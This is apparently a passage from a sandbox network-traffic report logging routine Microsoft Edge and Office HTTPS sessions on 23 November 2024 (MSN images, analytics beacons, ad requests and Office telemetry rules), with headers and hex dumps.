2024-11-23 06:09:51 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:51 UTC	515	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Thu, 14 Nov 2024 13:08:58 GMT X-Source-Length: 1658 X-Datacenter: westus X-ActivityId: 5207dc63-23db-47af-bb98-7b1841fb9ec3 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=68354 Expires: Sun, 24 Nov 2024 01:09:05 GMT Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:51 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.6	49916	18.238.49.124	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	1012	OUT	GET /b2?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1553f9fbcf8eec5bf09da821732342189; XID=1553f9fbcf8eec5bf09da821732342189
2024-11-23 06:09:51 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Sat, 23 Nov 2024 06:09:51 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 e3d2c542026df7b9357e3b591c889f64.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P3 X-Amz-Cf-Id: bgw6oJsmJ96b0suD-I_WMSW2kCfvB85W5rL1x1lroT7TQvy_dC34_A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.6	49919	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:51 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT X-Datacenter: northeu X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=200934 Expires: Mon, 25 Nov 2024 13:58:45 GMT Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:51 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.6	49918	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:51 UTC	515	IN	HTTP/1.1 200 OK Last-Modified: Sun, 10 Nov 2024 06:13:55 GMT Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G X-Source-Length: 5699 X-Datacenter: eastap X-ActivityId: 96a315e5-981f-47e5-bbfa-17d63c15ba44 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=86665 Expires: Sun, 24 Nov 2024 06:14:16 GMT Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:51 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.6	49921	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:51 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 17 Nov 2024 01:27:48 GMT X-Datacenter: eastus X-ActivityId: 4e8f5161-6e89-49b3-b675-e3ba25e83bf7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=285461 Expires: Tue, 26 Nov 2024 13:27:32 GMT Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:51 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.6	49920	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	634	OUT	GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:51 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb Last-Modified: Fri, 15 Nov 2024 21:15:54 GMT X-Source-Length: 3765 X-Datacenter: westus X-ActivityId: f3e4c9dc-fa16-4ee6-89a5-1e9169e1c90d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 3765 Cache-Control: public, max-age=184065 Expires: Mon, 25 Nov 2024 09:17:36 GMT Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:51 UTC	3765	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 01 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 3e 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 Data Ascii: PNGIHDR22?gAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.6	49914	13.89.179.8	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732342188666&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3734 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1
2024-11-23 06:09:51 UTC	3734	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 33 54 30 36 3a 30 39 3a 34 38 2e 36 36 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 61 61 65 30 66 39 63 2d 35 34 33 33 2d 34 31 66 61 2d 39 37 66 65 2d 35 30 65 33 31 32 33 35 31 39 36 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 38 34 34 35 35 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-23T06:09:48.662Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"2aae0f9c-5433-41fa-97fe-50e31235196c","epoch":"2588445565"},"app":{"locale
2024-11-23 06:09:51 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=3e0c00ecf4b54dcb8d6e0c4d511f1524&HASH=3e0c&LV=202411&V=4&LU=1732342191669; Domain=.microsoft.com; Expires=Sun, 23 Nov 2025 06:09:51 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=f0b70578e75949a2aed3948e33002c55; Domain=.microsoft.com; Expires=Sat, 23 Nov 2024 06:39:51 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3003 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.6	49915	20.75.60.91	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	1067	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=076D87ACE96D60880BB292ECE84461D8&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=0f2b81d35b21498bb7cefbe059bdc675 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1
2024-11-23 06:09:52 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:51 GMT Connection: close
2024-11-23 06:09:52 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	49922	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:51 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:52 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060952Z-178bfbc474b9xljthC1NYCtw9400000003yg00000000bbdt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:52 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	49923	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:52 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:52 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: e2b7c591-f01e-003f-257e-3bd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060952Z-174c587ffdfx984chC1TEB676g00000002mg000000003gty x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:52 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 